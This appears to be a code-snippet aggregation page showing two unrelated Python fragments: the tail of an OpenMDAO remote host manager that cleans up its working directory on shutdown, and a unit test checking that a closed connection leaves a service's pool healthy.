    # Register a cleanup function.
    def cleanup(directory):
        keep_dirs = int(os.environ.get('OPENMDAO_KEEPDIRS', '0'))
        if not keep_dirs and os.path.exists(directory):
            print '%s removing directory %s' % (ident, directory)
            shutil.rmtree(directory)
        print '%s shutting down host manager' % ident

    util.Finalize(None, cleanup, args=[data['dir']], exitpriority=0)

    # Start host manager.
    print '%s remote host manager starting in %s' % (ident, data['dir'])
    sys.stdout.flush()
    server.serve_forever()
예제 #30
0
 def testAbortedConnection(self):
     """Tests that a closed connection doesn't crash the service."""
     with self.run_service():
         client = connection.Client(self.address)
         client.close()
         self.assertTrue(self._pool_is_healthy())